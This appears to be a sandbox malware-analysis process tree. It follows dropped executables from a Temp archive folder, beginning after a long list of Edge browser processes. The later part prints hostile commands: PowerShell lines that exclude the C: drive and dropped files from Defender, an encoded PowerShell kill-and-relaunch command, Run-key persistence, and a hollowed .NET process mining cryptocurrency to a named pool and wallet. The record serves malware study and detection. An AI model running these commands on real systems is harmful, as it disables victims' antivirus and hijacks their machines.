C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e42947189⤵PID:3832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:89⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:39⤵PID:5360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:29⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:19⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:19⤵PID:7288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:19⤵PID:8080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:19⤵PID:7196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:19⤵PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:19⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:89⤵
- Executes dropped EXE
PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:89⤵PID:8704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4956 /prefetch:29⤵PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:19⤵PID:19232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:19⤵PID:9328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:19⤵PID:9640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2524 /prefetch:19⤵PID:10312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:19⤵PID:12292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:19⤵
- Suspicious use of SetThreadContext
PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:19⤵PID:7284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:19⤵PID:13552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:19⤵PID:13476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:19⤵PID:14012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:19⤵PID:9800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:19⤵PID:13084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:19⤵PID:15312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:19⤵PID:9492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:19⤵PID:16188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:19⤵PID:7736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:19⤵PID:16224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:19⤵PID:16268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:19⤵PID:15716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:19⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:19⤵PID:16452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:19⤵PID:17536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:19⤵PID:17564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:19⤵PID:17584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:19⤵PID:15504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:19⤵PID:4764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:19⤵PID:17736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:19⤵PID:17824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:19⤵PID:17884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:19⤵PID:18052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:19⤵PID:18476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:19⤵PID:18472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:19⤵PID:18452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2488 /prefetch:19⤵PID:18752
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe5⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09792fda06e.exeTue09792fda06e.exe6⤵
- Executes dropped EXE
PID:2220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 2767⤵
- Program crash
- Enumerates system info in registry
PID:2392
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe5⤵PID:3464
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue091e2054cef7.exeTue091e2054cef7.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2288 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"7⤵PID:5212
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'8⤵PID:6016
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"7⤵PID:8100
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"8⤵PID:6424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 2409⤵
- Program crash
PID:8444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe7⤵
- Adds Run key to start application
- Modifies registry class
PID:7764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com8⤵PID:7432
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ynyegl.vbs"8⤵PID:4628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\9⤵PID:4356
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgADcANwA2ADQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABnAGMAaAByAGQAZgBtAGEAYgAuAGUAeABlACIAOwAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABNAFMAQgB1AGkAbABkAC4AZQB4AGUAIgAgAC0ARgBvAHIAYwBlAA==8⤵PID:13928
-
C:\Users\Admin\AppData\Local\Temp\gchrdfmab.exe"C:\Users\Admin\AppData\Local\Temp\gchrdfmab.exe"9⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:16052 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Arjnavlnnfsgdjk.vbs"10⤵PID:19024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Chrome.exe'11⤵PID:19272
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe10⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
PID:19020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com11⤵PID:19300
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 a rx -k -u ETC:0xb0f43eE68f616bc263CCD517Be03329365dfe5E0.RIG02 -p x11⤵PID:12348
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe5⤵PID:3780
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09264824c4.exeTue09264824c4.exe6⤵
- Executes dropped EXE
PID:2024 -
C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"7⤵
- Executes dropped EXE
PID:5688
-
-
C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"7⤵
- Executes dropped EXE
PID:5620 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7968
-
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"7⤵
- Executes dropped EXE
PID:5336 -
C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵PID:5588
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe" -Force8⤵PID:6404
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵PID:4268
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵PID:5888
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵PID:5484
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5776
-
-
